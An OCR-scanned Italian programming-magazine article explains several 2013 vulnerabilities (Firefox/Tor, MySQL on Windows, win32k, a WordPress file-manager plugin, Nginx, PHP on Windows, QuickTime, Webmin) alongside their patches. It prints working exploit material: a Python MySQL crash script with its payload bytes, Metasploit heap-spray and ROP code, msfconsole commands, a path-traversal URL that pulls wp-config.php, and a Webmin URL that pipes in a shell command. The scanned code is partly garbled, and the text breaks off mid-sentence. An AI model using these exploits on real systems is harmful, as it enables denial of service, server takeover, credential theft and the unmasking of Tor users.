esistono diverse “reti parallele” progettate con una struttura peer- 
to-peer, una di queste è Tor (https://www.torproject.org). Si tratta di 
una rete basata sul protocollo “onion routing”, che letteralmente 
significa “instradamento a cipolla”, grazie al quale i pacchetti di co- 
municazione, cifrati, non passano direttamente dal client al server di 
destinazione, ma attraversano una serie di computer (chiamati nodi) 
appartenenti alla rete Tor e solo alla fine arrivano su Internet in chia- 
ro, rendendo non identificabile un utente. È quindi evidente quanto 
questo bug possa essere pericoloso: molte persone che affidano 
la propria sicurezza nella mani di Tor e Firefox (perchè, per esem- 
pio, vivono in paesi con regimi dittatoriali) hanno rischiato di essere 
identificate, mentre erano convinte di potersi muovere liberamente. 
Il bug in questione è legato all'evento onreadystatechange di 


Fig. 2: L'exploit della vulnerabilità di Firefox tramite Metasploit 
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una XmIHttpRequest in JavaScript. In pratica, quando una pagi- 
na contenente riferimenti a questo evento viene caricata in Firefox 
e successivamente aggiornata (il classico “refresh”), l'applicazione 
non gestisce correttamente l'evento onreadystatechange e consente 
l'accesso alla memoria. La maggior parte dei siti moderni è basata 
sulla XmIHttpRequest che, per chi non lo sapesse, è un semplice 
strumento che consente ad una applicazione web di leggere il conte- 
nuto di un’altra pagina. Per esempio, si può usare un oggetto XmlHt- 
tpRequest per leggere una pagina che contiene informazioni sul me- 
teo, e poi elaborare il testo ottenuto in modo da presentarlo all’interno 
della propria applicazione (magari con qualche modifica). Quando un 
programmatore vuole usare questo particolare oggetto, gli assegna 
l'indirizzo della pagina da caricare e poi dà il comando per avviare la 
lettura della pagina in questione. Però c'è un problema: la pagina può 
essere pesante e, quindi, l'oggetto XhmIHttprequest impiegherà 
un certo tempo per leggerla tutta. Il programmatore, quindi, ha bi- 
sogno di qualcosa che gli faccia sapere che la lettura è terminata, in 
modo da poter mandare avanti l'esecuzione del codice JavaScript. 
Per questo scopo è stato creato l'evento onreadystatechange: 
appena la pagina è stata letta e caricata nell'apposita variabile, vie- 
ne eseguita la funzione che era stata precedentemente associata 
all'evento. Ecco un esempio: 


xmlhttp.onreadystatechange=function() 
{ 
if (xmlhttp.readyState==4 && xmlhttp.status==200) 
{ 
document.getElementById(“myDiv”). 
inner5STML=xmlhttp.responseText; 


} 


Con questo codice abbiamo associato una funzione all'evento on- 
readystatechange: appena l'oggetto xmIhttp avrà finito di leg- 
gere la pagina assegnata, verrà chiamata la funzione che abbiamo 
scritto. Questa funzione verifica che la richiesta HTTP sia andata a 
buon fine (lo stato deve essere 200) e poi scrive all’interno dell’ogget- 
to myDiv tutto il testo contenuto nella pagina. Fin qui tutto bene, Ab- 
biamo detto che il bug si verifica al refresh della pagina: il fatto è che 
con JavaScript si può eseguire il refresh via codice, rendendo quindi 
automatica la procedura di esecuzione dell’exploit. È sufficiente che 
l'utente carichi la pagina incriminata ed il codice JavaScript in essa 
contenuto innescherà l'esecuzione dell’exploit. Il codice presente in 
Firefox responsabile della vulnerabilità è il seguente: 


NS _NewContentViewer(nsIContentViewer** aResult) 
{ 

*aResult = new DocumentViewerImpl(); 

NS _ADDREF(*aResult); 

return NS_0K; 


Possiamo trovare queste righe nel file nsdocumentviewer.cpp: 
tramite un debugger, infatti, si scopre che è la creazione dell'oggetto 
DocumentViewerImpl e la conseguente chiamata della funzio- 
ne nsDocumentViewer::Stop a mandare in crash il programma 


per un errore di segmentazione. Come sappiamo, un errore di que- 
sto tipo può consentire l'esecuzione di codice grazie ad una ROP 
chain. Infatti, se osserviamo l’exploit presente nella suite Metasploit, 
scopriamo che carica sull'indirizzo di memoria 0x0c101008 (memo- 
rizzato col nome di FakeObject) il codice binario “pivot”: 


pivot = “\x64\xal\x18\x00\x00\x00" 
pivot << “\x83\xC0\x08” 

pivot << “\x8b\x20" 

pivot << “\x81\xC4\x30\xF8\xFF\xFF" 


Questo codice innesca la catena ROP, ed è incorporato nel file HTML 
che verrà creato da Metasploit per testare la vulnerabilità. La pagina 
HTML malevola contiene, ovviamente, codice JavaScript: 


function b() { 

for(var c=0;1024>c;ct+) { 
test[c]=new ArrayBuffer(180); 

bufView = new Uint32Array(test[c]); 
for (var i=0; i < 45; i++) { 
bufView[i] = #{target[‘FakeObject']}; 
} 

} 

} 


La funzione “b” consiste in un ciclo for eseguito 1024 volte che riem- 
pie ogni valore dell’array test con un altro array i cui valori, a loro vol- 
ta, sono tutti uguali al puntatore FakeObject (che indica l'indirizzo di 
memoria in cui è contenuto il codice della ROP chain): 


function a() { 

window.stop(); 

var myshellcode = unescape(“#{js_code}"); 
var myfillsled = unescape(“#{js_random}”"); 
heapSpray(myshellcode,myfillsled); 

b(); 
window.parent.frames[0].frameElement.owner 
Document.write(z); 


} 


La funzione “a” chiama la funzione stop che, come abbiamo visto, è 
la reale responsabile dell'errore di segmentazione (quindi non è nem- 
meno necessario eseguire il refresh della pagina). Subito dopo viene 
caricato lo shellcode nella memoria del computer vittima grazie alla 
funzione heapSpray (che non abbiamo analizzato ma che è possi- 
bile trovare nel file mozilla_firefox_onreadystatechange.rb tra 
gli exploit di Metasploit). Infine, viene chiamata la funzione “b” che 
abbiamo appena descritto: 


document.addEventListener(“readystatechange”,a,nu 
11); 


Prima della conclusione dello script viene assegnata la funzione “a” 
all'evento onreadystatechange, innescando l’intero meccanismo 
che porta all'esecuzione dello shellcode. È ovvio che se qualcuno 
può sfruttare questa vulnerabilità per eseguire del codice, può facil- 


mente ottenere l'identità della vittima anche se questa sta utilizzando 
Tor (in fondo basta verificare l'IP della connessione senza passare at- 
traverso il proxy anonimo). Infatti, è subito comparsa la notizia secon- 
do cui l'FBI abbia utilizzato questo bug per identificare diverse perso- 
ne che si stavano nascondendo dietro Tor. Del resto non è una novità 
che il bureau tenti continuamente di espugnare la sicurezza della rete 
a cipolla (http://goo.gl/aPGYIk). La vulnerabilità è stata corretta in Fire- 
fox e Thunderbird ESR 17.0.7, molto rapidamente. Del resto, gli stessi 
sviluppatori di Metasploit hanno ammesso: “Non ci occupiamo spes- 
so dei bug di Firefox, visto che solitamente è difficile che non arrivi 
subito una patch”. 


DATABASE PERICOLOSI 

La maggior parte di siti web utilizza dei database, ed il più diffuso è 
certamente MySQL. Wikipedia, YouTube, e Yahoo!, oltre a tutti i siti 
basati su WordPress, Joomla o phpBB, utilizzano un database My- 
SQL. Se un malintenzionato volesse bloccare uno di questi siti avreb- 
be quindi due possibilità: la prima è saturare la banda del webserver, 
la seconda bloccare il server MySQL, senza il quale il sito non può 
più funzionare. Ovviamente, la prima tecnica è molto complessa da 
realizzare, perché questi siti generalmente dispongono di molta ban- 
da di rete. Mandare in Denial of Service (DOS, rifiuto del servizio) 
un server MySQL è comunque complicato, di norma, ma di recente è 
stato scoperto un bug che facilitava enormemente questa operazio- 
ne. Semplicemente inviando al server, senza nemmeno essere auten- 
ticati, una speciale sequenza di caratteri si provoca il crash del pro- 
gramma, causando un DoS. Il bug funziona soltanto con la versione 
di MySQL per Windows, e questo riduce di molto il rischio, visto che la 
maggior parte dei server MySQL è ospitata su sistemi GNU/Linux, ma 
il pericolo non va comunque sottovalutato. In fondo, a causa di que- 
sta vulnerabilità un server MySQL (fino alla versione 5.5.8) Windows 
può essere “spento” da chiunque. Possiamo verificare il bug tramite 
il semplice exploit che vi proponiamo. In particolare, si tratta di un 
programma Python che si collega al server vittima ed invia la stringa 
incriminata. Per prima cosa vengono importate le librerie necessarie 
alla connessione ad un server. 


import socket, sys 


Nella funzione principale, verifichiamo che siano stati forniti due argo- 
menti al programma Python, altrimenti non possiamo proseguire (il 
primo argomento è il nome del file .py, mentre il secondo è l’indirizzo 
IP da attaccare): 


def main(): 
if len(sys.argv) = 2: 
sys.exit() 


A questo punto, viene creato un socket per connettersi al server vit- 
tima: 


s = socket.socket(socket.AF_INET, socket.SOCK_1 
STREAM) 


Infine, stabiliamo la connessione al server indicato come argomento 
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del programma, e come porta utilizziamo la 3306 (porta standard di 
MySQL): 


HOST sys.argv[l] 
PORT int (3306) 
s.connect((HOST,PORT)) 


Inviamo il payload, cioè la stringa malevola, contenuta nella variabile 
buf. La variabile buf2, invece, contiene un’altra stringa che serve 
solamente a verificare che il server non risponda più: 


print “[*] Connect” 

s.send(buf) 

print “[*] Payload 1 sent” 

s.send(buf2) 

print “[*] Payload 2 sent\n”, “[*] Run again tol 
ensure 


it is down..\n" 


Chiudiamo il socket e con esso la funzione main, inserendo, però, 
una istruzione per ripetere nuovamente in un loop infinito (che si inter- 
romperà quando il server non sarà più in grado di rispondere a buf2) 
la funzione main stessa: 


s.close() 
if __name == * main_”": 
main() 


La routine principale comincia con una presentazione del program- 
ma, in questo caso MySQL 5.5.8: 


print “\n" 
print “ MySQL 5.5.8 Null Ptr (windows)” 
print “\n" 


Infine, vengono definite le stringhe buf e buf2, che, come abbiamo 
visto, saranno inviate alla vittima per provocare il crash del server 
MySQL: 
buf=(”“&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00\1 
X93\X00\x00\x00\x00\x00\x00\x00\x00” 
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\1 
x00\x00\x00root\x00\x00”) 
bu£2=(“\x11\x00\x00\x00\x03set autocommit30”) 


L'ultima istruzione consiste nella chiamata della funzione main, che 
quindi innesca la procedura di exploit. 


main() 

A questo punto, possiamo testare l’exploit con il comando seguente: 
python mysql.py 192.168.1.130 

Nello specifico, mysql.py è il nome del file Python, e 192.168.1.130 è 


l'indirizzo IP della vittima, che può trovarsi sia in una rete locale sia su 
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Internet). La stringa buf causa nel server MySQL una “null pointer 
dereference”, letteralmente un “mancato riferimento con puntatore 
nullo”. Significa che un puntatore di memoria con valore nullo è stato 
utilizzato come se fosse riferito ad un’area di memoria valida. In altre 
parole, la stringa malevola contiene un testo non valido: il testo viene 
passato ad una funzione che verifica se si tratta di una stringa valida. 
Visto che non lo è, la funzione restituisce in una variabile un valore 
nullo. Il problema è che in questo modo la variabile in questione con- 
tiene un puntatore ad un’area di memoria non valida (perché è un 
puntatore nullo), ma quando MySQL la interpreta come un indirizzo di 
memoria da utilizzare, e appena si accorge che l’indirizzo non punta 
a niente va in crash. Il bug è stato risolto rapidamente inserendo una 
semplice istruzione di controllo: 


if (pointer != NULL) { 


In pratica, questa verifica che il puntatore non sia nullo prima di uti- 
lizzarlo. 


WINDOWS: SIAMO TUTTI 
AMMINISTRATORI! 


Windows non è certo famoso per la sicurezza del suo sistema di ge- 
stione degli utenti. Tutti ricordiamo quanto fosse facile decifrare le 
password di Windows 98 e non è nemmeno stato necessario molto 
tempo per scardinare la sicurezza di SAM (il sistema di archiviazio- 
ne “sicura” delle password sui modemi sistemi Microsoft). Infatti, 
ormai esistono strumenti, come il celebre ntpasswd (http://g00.gl/ 
AMqv3A), che consentono a chiunque la modifica delle password e 
dei privilegi degli utenti sulle ultime versioni di Windows (Fig. 3). Que- 
sti strumenti, però, funzionano se il sistema Windows non è in esecu- 
zione, quindi un malintenzionato deve poter accedere fisicamente al 
computer ed avviarlo, ad esempio, con una distribuzione GNU/Linux. 
Significa che i computer posti in luoghi pubblici non sono sicuri, ma 
quelli per uso personale o comunque non accessibili a molte per- 
sone, per esempio il nostro computer di casa oppure i server, sono 
abbastanza sicuri. Certo, sicuri finché non salta fuori una vulnerabilità 
come la CVE-2013-3660. Questa, scoperta di recente, con l’exploit 
rilasciato a luglio 2013, consente ad un malintenzionato di ottenere 


Fig. 3: Modificare la password di Windows è facile 


i privilegi di qualsiasi utente: significa che può entrare nell'account 
di un utente semplice (di solito poco protetto) e poi diventare am- 
ministratore. La cosa grave è che questa vulnerabilità è presente su 
tutti i sistemi Microsoft, sia le versioni per home computing sia quelle 
per i server (l’exploit funziona su Windows 7, 8 e Server 2012, per 
esempio). Il bug è legato al file di sistema win32k.sys. Ovviamen- 
te, essendo un bug di un prodotto Microsoft (closed source), non 
possiamo sapere esattamente qual è la linea di codice responsabile 
della vulnerabilità, ma eseguendo un debug possiamo scoprire che 
la colpa è della funzione EPATHOBJ::pprFlattenRec. Più preci- 
samente, del fatto che questa funzione costruisce un nuovo oggetto 
chiamando la EPATHOBJ::newpathrec ma non lo inizializza. E 
tutti sappiamo che succede quando si cerca di accedere ad un array 
non inizializzato. 

Non si tratta, però, di un semplice errore di segmentazione: l’alloca- 
tore dimemoria PATHALLOC (con cui funziona la pprFlattenRec) 
restituisce la porzione di memoria “incriminata” non al programma in 
esecuzione ma alla libreria win32k.sys. Questo significa che se il 
pirata riesce ad inserire nella memoria del codice, può farlo eseguire 
alla libreria con i privilegi di quest’ultima (che è system, quindi può 
fare qualsiasi cosa). In pratica, non si tratta solo di poter eseguire 
codice come avveniva con il bug di Flash, ma si può eseguire codi- 
ce con privilegi di amministrazione. Per innescare il bug è sufficiente 
realizzare una applicazione che chiami più volte la funzione per il di- 
segno di un rettangolo arrotondato: 


for (Size = 1 << 26; Size; Size >>= 1) { 
while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1)); 
} 


Nello specifico, il ciclo for continuerà fino al crash della libreria di cui 
abbiamo parlato. Anche in questo caso, è possibile testare l’exploit 
relativo al bug grazie a Metasploit, basta eseguire dalla msfconsole 
i seguenti comandi: 


use exploit/windows/local/ppr_flatten_rec 
exploit 


A questo punto, Metasploit eseguirà una libreria (presente nella car- 
tella “CVE-2013-3660” tra i file della suite) che contiene il codice 
malevolo: 


session.core.load library({ 

“LibraryFilePath” => File.join(Msf::Config.install 1 

root, “data”, “exploits”, “cve-2013-3660”, “exploit. 

dll”), 

“UploadLibrary” => true, 

“Extension” => false, 

“TargetFilePath" => “#{rand_text_alpha(5 +1 
rand(3))}.dll”", 

“SaveToDisk” => false 


}) 


Subito dopo il caricamento della libreria lo script di Metasploit verifica 
se ha ottenuto i privilegi di system (che è un grado ancora più alto 
di administrator): 


if is system? 
print _good(“Exploitation successful”) 


Questo exploit funziona solo su sistemi a 32 bit (che sono comunque 
la maggior parte, almeno per il momento). Tra l’altro, il codice respon- 
sabile della vulnerabilità è presente in Windows fin dalle versioni pre- 
cedenti NT (da Windows 95-98 in poi). Questa è una ulteriore prova 
del fatto che il codice “vecchio” non è necessariamente più sicuro, e 
dovrebbe essere sempre accuratamente controllato. 


SU INTERNET È TUTTO PUBBLICO 


WordPress è lo strumento principe per la realizzazione di blog, segui- 
to a ruota da Joomla e Drupal. Come accade con tutti i CMS, anche 
su WordPress è possibile installare delle estensioni: una di quelle più 
utilizzate è senza dubbio wp-filemanager, un ottimo file manager 
per gestire facilmente i file contenuti nel sito. Molto utile soprattutto 
in sostituzione di un client FTP, per quei blog in cui esistono diversi 
autori ma non si vuole affidare la password FTP a tutti. Il file manager 
consente agli autori del blog di creare nuovi file o caricarli sul sito dal 
proprio computer, cancellare o spostare quelli già presenti e, natu- 
ralmente, scaricarli. Quest'ultima funzione, però, presenta una vul- 
nerabilità: l’amministratore del sito può, infatti, fissare la cartella base 
(per esempio wp-admin/images/) e in teoria gli utenti potranno 
spostarsi solamente all’interno di questa cartella e nelle relative sub- 
directory. In realtà, però, usando la stringa “../”, che rappresenta la 
directory madre di quella attuale, è possibile per un malintenzionato 
risalire fino alla directory root del sito, e, di conseguenza, leggere 
il file wp-config.php. Questo file contiene tutte le impostazioni 
di sicurezza del blog, comprese il credenziali di accesso al server 
MySQL (rendendo quindi più facile un eventuale attacco al databa- 
se). Questa cosa non dovrebbe essere consentita e la stringa “../” 
non dovrebbe essere accettata. Invece, la stringa viene accettata 
e chiunque (anche qualcuno non loggato al blog) può risalire al file 
usando il percorso seguente: 


wp-content/plugins/wp-filemanager/incl/libfile.php? 
&path=../../&filename=wp-config.php&action=download 


Ad esempio, se il nostro sito è “Wwww.ilmiosito.if”, utilizzando l’indiriz- 
zo seguente possiamo leggere il file di configurazione wp-config. 
php senza alcuna difficoltà: 


http://www.ilmiosito.it/wp-content/plugins/wp-filema 
nager/incl/libfile.php?&path=../../&filename=wp-config. 
php&action=download 


Per risolvere il bug, è sufficiente impedire l’uso dei doppi punti nei 
percorsi, e infatti, nella versione 1.3.1 del file manager è stata appor- 
tata una correzione che risolve il problema. Tradotto in linguaggio 
PHP, basta una istruzione del tipo seguente: 


if (strpos($path,’..’) 
{ 

print “Tutto ok.”; 

} 


== false) 


do 

co 

se 
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Ovvero, è sufficiente inserire il codice in un ciclo if che controlla (con 
la funzione strpos) l’esistenza della stringa “..” nella variabile $path 
(che contiene il percorso richiesto dall’utente). Il codice sarà, quindi, 
eseguito solamente se la funzione strpos restituisce un valore falso, 
confermando che la stringa del percorso non contiene i doppi punti. 
Inserire una istruzione di questo tipo in una qualsiasi delle proprie 
applicazioni che si trovi a dover lavorare con un percorso specificato 
dagli utenti è buona norma per evitare situazioni di pericolo come 
quella in cui si è trovato WordPress. 


FACEBOOK KO! 


Apache è il re indiscusso dei server web, grazie a questo software, 
infatti, funziona la maggior parte dei siti web presenti su Internet 
(quasi il 70%). Ma ce n'è un altro che sta risalendo la classifica ad 
una velocità spaventosa, stiamo parlando di Nginx (http://nginx.org). 
Attualmente fa “girare” quasi il 10% dei siti di tutto il mondo, e su di 
esso sono basati anche importanti servizi di Netflix, Google, e Fa- 
cebook. Questo significa che quando vacilla la sicurezza di Nginx, 
Facebook e gli altri siti basati su questo server web sono in pe- 
ricolo. Ed è proprio quello che è successo con le versioni 1.3.9 e 
1.4.0 di Nginx, infatti, inviando al server una stringa particolarmente 
lunga usando il chunked transfer encoding del protocollo HTTP, 
si riesce a causare un buffer overflow. Il bug potrebbe condurre 
anche all'esecuzione di codice (usando una ROP chain), ma è già 
abbastanza pericoloso così: questo overflow, infatti, è in grado di 
mandare in crash il server, rendendo inaccessibile i relativi siti web. 
La codifica per il trasferimento a “pezzi” di HTTP funziona in modo 
molto semplice: il contenuto da inviare viene diviso in più parti che 
vengono trasmesse in sequenza. Ogni blocco è preceduto dalla 
sua dimensione (così il ricevente capisce quando il trasferimento è 
completo) e chiuso dalla sequenza di escape CRLF, ovvero “\r\n”. 
Per esempio, per inviare la stringa ioProgrammo in tre pezzi possia- 
mo usare questa sequenza: 


4\r\n 
ioPr\r\n 
3\r\n 
ogr\r\n 
4\r\n 
ammo\r\n 


Questa codifica consente, quindi, di inviare contenuti molto grandi 
dividendoli in pacchetti più piccoli, in modo da rendere la comuni- 
cazione più sicura ed efficiente, oltre a consentire la trasmissione 
continua del contenuto. Tutto questo è perfetto per le pagine create 
dinamicamente, visto che il server può cominciare ad inviare il testo 
della pagina anche se non è ancora stato scritto completamente, in 
modo da non dover aspettare che la costruzione della pagina debba 
essere terminata prima di fornire qualcosa al client. Naturalmente, la 
comunicazione può avvenire sia dal server verso il client sia vicever- 
sa. Quello che è fondamentale, però, è che il ricevente sia in grado di 
gestire tutto il testo che gli arriva. Infatti, il problema è che non si può 
sapere in anticipo quanto grande sarà l’intera stringa e il ricevente, se 
non è programmato correttamente, rischia di andare in overflow. Per 
risolvere il problema, gli sviluppatori hanno introdotto una semplice 
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patch che aggiunge al file src/http/ngx_http_parse.c le seguenti 
righe: 


if (ctx->size < 0 || ctx->length < 0) 
{ 
goto invalid; 


} 


Si tratta di un banale controllo sulla effettiva dimensione del buf- 
fer con cui si sta lavorando. Ovviamente, è possibile testare anche 
questa vulnerabilità grazie all’exploit linux/http/nginx_chun- 
ked_size.rb di Metasploit, che invia una semplice richiesta HTTP 
al server vittima: 


request = “GET / HTTP/1.1\r\n" 

request << “Host: #{Rex::Text.rand text_1 
alpha(16)}\r\n” 

request << “Transfer-Encoding: Chunked\r\n” 

request << “\EXna 

request << “#{data}”" 


Com'è facile notare, la richiesta è indicata come chunked en- 
coding transfer, e viene inserita la variabile data. Quest'ultima 
contiene lo stack canary, un numero che viene posizionato tra la 
memoria dedicata al buffer e l'indirizzo di retum per rendere più com- 
plicata la vita dei cracker, ed una sequenza di valori esadecimali che 
saranno utilizzati per prendere il controllo del processo Nginx dopo 
l'avvenuto crash: 


0x08094129, 
0x080c5090, 


Possiamo eseguire l’exploit con la console msfconsole di Meta- 
sploit eseguendo i seguenti comandi: 


use exploit/linux/http/nginx chunked size 
set RHOST 127.0.0.1 
set RPORT 81 


Supponendo, naturalmente, di avere installato Nginx sulla macchina 
locale sulla porta 81. 


LA PORTA DI SERVIZIO 


Di recente, è stata scoperta una pericolosa vulnerabilità nella ver- 
sione del compilatore PHP per Windows. In pratica, utilizzando una 
pagina PHP creata ad hoc, è possibile causare un buffer overflow ed 
eseguire codice malevolo, ottenendo, addirittura, i privilegi di ammi- 
nistrazione sul sistema vittima (Fig. 4). Naturalmente, è necessario 
caricare sul server vittima una pagina PHP malevola, quindi, biso- 
gna avere un accesso FTP e ciò significa che il pirata dovrebbe regi- 
strarsi per poter eseguire l'attacco, risultando riconoscibile. Però, se 
sommiamo questa vulnerabilità con quella di Joomla che consente 
l'upload di file PHP senza controllo, ci rendiamo subito conto della 
pericolosità del problema: chiunque potrebbe caricare sul server un 
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Fig. 4: Sfruttando il bug di PHP è possibile ottenere i privilegi di amministratore sul sistema vittima e 
scaricare, ad esempio, il file delle password del sito 


file malevolo ed assumere il controllo del server senza poter essere 
rintracciato. Il bug è causato dalla funzione com_print_typeinfo(), 
che non gestisce correttamente gli oggetti variant. L'exploit è co- 
stituito da un file PHP: 


$spray = substr replace($spray,$shellcode, 
(strlen($spray)-0x50)*-1,(strlen($shellcode))); 


La variabile $spray contiene lo shellcode, ovvero il codice binario da 
eseguire dopo il crash del compilatore PHP. 


$fullspray=""; 
for($i=0;$i<0x4b00;$i++) 
{ 

$fullspray.=$spray; 
} 


Con le righe precedenti viene creata una nuova variabile chiamata 
$fullspray, che è costituita da una serie di ripetizioni della $spray. 
L'obiettivo è di saturare la memoria del server con lo shellcode. 


$J=array(); 
$e=array(); 
$b=array(); 
$a=array(); 
$c=array(); 


Vengono dichiarati cinque nuovi array, che ovviamente occuperanno 
un discreto spazio in memoria. 


array push($j,$fullspray); 

array push($e,$fullspray."W"); 
array _push($b,$fullspray."A”); 
array_push($a,$fullspray."S"); 
array _push($c,$fullspray.”!"); 


A questo punto, ciascun array viene riempito con l'enorme stringa 
$fullspray. Queste operazioni hanno già messo sotto sforzo le ri- 
sorse del server, ed è ormai arrivato il momento per tentare di man- 
darlo crash: 


$vVar = new VARIANT(0x048d0038+$offset); 
com print typeinfo($vVar); 


Il crash del compilatore viene indotto semplicemente creando un 
oggetto di tipo variant e passandolo alla funzione com_print_ 
typeinfo(). Tutto questo codice viene eseguito più volte, ciascuna 
con un $offset diverso, poiché il file PHP viene chiamato da una 
pagina HTML tramite un ciclo for in JavaScript che esegue 300 ite- 
razioni. C'è un particolare: lo shellcode verrà eseguito dallo stesso 
utente che stava eseguendo il compilatore PHP, quindi, molto pro- 
babilmente, avrà privilegi di amministrazione. Si potrebbe comunque 
obiettare che, visto che il pirata è riuscito ad inserire sul server un file 
PHP, tanto valeva eseguire direttamente comandi di sistema a pia- 
cere tramite la funzione exec, ma le cose non stanno effettivamente 
così. Il fatto è che questa funzione (come anche proc_open e altre 
ancora) può essere disabilitata, anzi, sui server pubblici solitamente 
lo è, quindi, l’unico modo che il pirata ha per accedere ad una shell 
di sistema è sfruttare il bug che abbiamo appena analizzato. Ricor- 
diamo che i server GNU/Linux con PHP non sono affetti da questa 
vulnerabilità, mentre quelli basati su server Windows ne soffrono. 


APPLE E MICROSOFT, 
COPPIA IMPERFETTA 


Gli ultimi sistemi operativi Apple (tutte le versioni di Mac OS X e i0S) 
sono basati su Unix, per la precisione sul kernel di FreeBSD (www. 
freebsd.org), quindi beneficiano della sicurezza intrinseca dei sistemi 
FOSS e sono stati esposti a pochi bug negli ultimi anni. Non sono 
comunque particolarmente diffusi, infatti, i sistemi Windows vincono 
nel mercato dell'home computing, mentre GNU/Linux in quello dei 
server. Esiste, però, un'applicazione Apple particolarmente diffusa, 
perché disponibile per diversi sistemi operativi: questa è QuickTi- 
me. 

Sono infatti molti anche gli utenti Windows che utilizzano QuickTime 
come riproduttore multimediale. E proprio nella versione di QuickTi- 
me per il sistema di casa Microsoft è stato scoperto un bug che man- 
da il programma in crash per overflow. E, com'è facile immaginare, è 
stato sviluppato un exploit per tradurre questo buffer overflow nella 
possibilità di eseguire del codice. Il bug è presente nelle versioni dal- 
la 7.7.0 alla 7.7.3 del programma, ed è dovuto ad un calcolo errato 
della dimensione di un atom dref durante la lettura di un file MOV. 
La struttura di un file MOV è complessa, ma questo non ci interes- 
sa. Tutto ciò che bisogna sapere è che esistono dei tag chiamati 
atoms, ed uno di questi è identificato col nome dref. L'atom dref 
serve a fomire un riferimento per i dati da riprodurre. Vediamo ora di 
capire come funziona l’exploit di Metasploit. Innanzitutto, viene cre- 
ato un file HTML: 


<html> 

<head> 

<script> 

#{js_property_ spray} 

var s = unescape(“#{js_p}”); 
sprayHeap({shellcode:s}); 
</script> 


Il file contiene uno script JavaScript che usa la funzione sprayHeap 
(fornita da Metasploit) per riempire la memoria del computer vittima 
con lo shellcode che verrà eseguito dopo l’overflow per prendere il 
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controllo del sistema. 


</head> 

<body> 

<embed src="#{get resource}/#{fake mov name}” 
width="0"” height="0"></embed> 

</body> 

</html> 


Poi si inserisce un oggetto embed, che è il file MOV malevolo. 
Quando la pagina HTML verrà aperta, l'oggetto incluso verrà ripro- 
dotto dal plugin di QuickTime per pagine web. Vediamo ora come 
viene costruito il file MOV: 


10.times { 
buf << rop_nop(target) 


La variabile buf viene riempita con la ROP chain adatta alla versione 
di QuickTime in uso sul sistema (target). 


buf << [ 
target[‘Pop'], 
0x20302020 
].pack(‘V*’) 


Alla variabile viene anche aggiunto l’indirizzo in cui si trova la ROP 
chain. 


mov = “\x00\x00\x06\xDF” 
mov << “moov” 
mov << “\x00\x00\x06\xD7” 
mov << “rmra” 
mov << “\x00\x00\x06\xCF” 
mov << “rmda” 
mov << “\x00\x00\x06\xBF" 
mov << “rdrf” 
mov << “\x00\x00\x00\x00” 
mov << “alis” 
mov << “\x00\x00\x06\xAA” 
mov << rand text alpha(8) 


Nella variabile mov viene scritto il file malevolo: si inizia con la dimen- 
sione del file e si procede con gli atom previsti dalle specifiche del 
tipo di file MOV. 


mov << rand_ text alpha(8) 
mov << “\x00\x00" 

mov << “\x00\x26" 

mov << rand text alpha(38) 
mov << “\x00\x0F\x00\x0E” 
mov << “AA” 

mov << “\x00\x12\x00\x21” 
mov << rand text alpha(36) 


Ad un certo punto, viene inserita una dimensione non valida (AA), 
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che manderà in crash QuickTime. 


mov << buf 
@exploit = mov 


Alla variabile mov viene aggiunta la buf e l’exploit è pronto per par- 
tire. 


(FUORI) CONTROLLO REMOTO 


| sistemi GNU/Linux sono poco utilizzati per l'home computing 
(eccetto sistemi embed e mobile), ma dominano in ambito ser- 
ver. Naturalmente, i server devono essere gestiti da remoto, ed 
esistono fondamentalmente due modi per farlo: il primo con- 
siste nell'usare SSH per accedere al terminale del sistema. Il 
secondo consiste nell’utilizzare una interfaccia grafica web per 
eseguire le operazioni necessarie. La prima soluzione è molto 
comoda per i più esperti (per i “veri” sysadmin), ma rischia 
di essere troppo complessa per chi non è abituato a lavora- 
re con una console testuale. Inoltre, spesso anche i sysad- 
min preferiscono utilizzare uno strumento grafico che possa 
fornire rapidamente tutte le informazioni più importanti in una 
pagina web, accessibile anche dal proprio smartphone (usare 
SSH dal telefono non è una cosa tanto comoda!). È per questo 
motivo che esistono programmi come Webmin (www.webmin. 
com). Si tratta di un'applicazione PHP che consente di gestire 
tutti gli aspetti fondamentali di un sistema GNU/Linux server 
in modalità completamente grafica. Poiché si tratta di un’in- 
terfaccia web, tutto è completamente accessibile mediante un 
comune browser (Fig. 5). 

Tutto perfetto, dunque, se non fosse per una vulnerabilità mol- 
to grave scoperta nella versione 1.58. A causa di questo bug, 
un utente, già loggato, può accedere a file sui quali non gode 
di alcun permesso. In pratica, si accede all’interfaccia di Web- 
min tramite il nome utente e la password che si usano nel si- 
stema stesso, esattamente come si farebbe con SSH. Questo 
significa anche che in Webmin avremo gli stessi privilegi che 
abbiamo nel sistema. 

Per esempio, se il nostro utente non è autorizzato a leggere 
i file degli altri utenti tramite la shell, non potremo farlo nem- 


Fig. 5: La shell di GNU/Linux all'interno di Webmin 


meno da Webmin. E, invece, esiste un bug che consente ad 
un utente di accedere anche ai file per i quali non ha alcuna 
autorizzazione. Il bug è stato individuato ne! file edit_html.cgi, 
il cui codice non verifica correttamente i permessi dell’uten- 
te loggato. Per verificarlo, è sufficiente creare un file di prova 
come utente root, per esempio: 


sudo nano /test 


A questo punto, bisogna scrivere qualcosa al suo interno e salvarlo. 
Poi lo si rende visibile solo all'utente root con il comando seguente: 


sudo chmod 700 /test 


Infine, si apre il proprio browser, autenticandosi come un 
utente normale, alla pagina Attps://localhost:10000/file/edit_htmi. 
cgi?file=/test. In particolare, 10000 è la porta di ascolto di Web- 
min. Se riusciamo a leggere il contenuto del file è ovvio che 
abbiamo verificato il bug. Il problema sta nel fatto che la va- 
riabile FILE (ottenuta dalla richiesta HTTP GET) viene passata 
direttamente alla funzione open_readfile: 


&open_readfile(FILE, $_[0]) || return undef; 
local $/ = undef; 

my $rv = <FILE>; 

close(FILE)}; 

return $rv; 


Questa funzione, poi, preleva il nome del file presente nel file 
system dalla richiesta HTTP, chiamando, infine, la funzione 
open che legge l’intero contenuto del file: 


sub open readfile 

{ 

my ($fh, $file) = @_; 

$fh = &callers package($fh); 

my $realfile = &translate filename($file); 
&webmin debug _log('READ', $file) if ($gconfig{'debug_ 
what_read'}); 

return open($fh, “<".$realfile); 


} 


Esiste anche un altro problema, simile, nella pagina show.cgi: 
la pagina non filtra i caratteri speciali, consentendo l’uso di 
una pipe (che in ambiente GNU/Linux serve a concatenare dei 
comandi). 

Quindi, se andiamo a visitare la pagina web hAttps://local- 
host:10000/file/show.cgi/bin/echo|Is%20-la| verranno eseguiti sia 
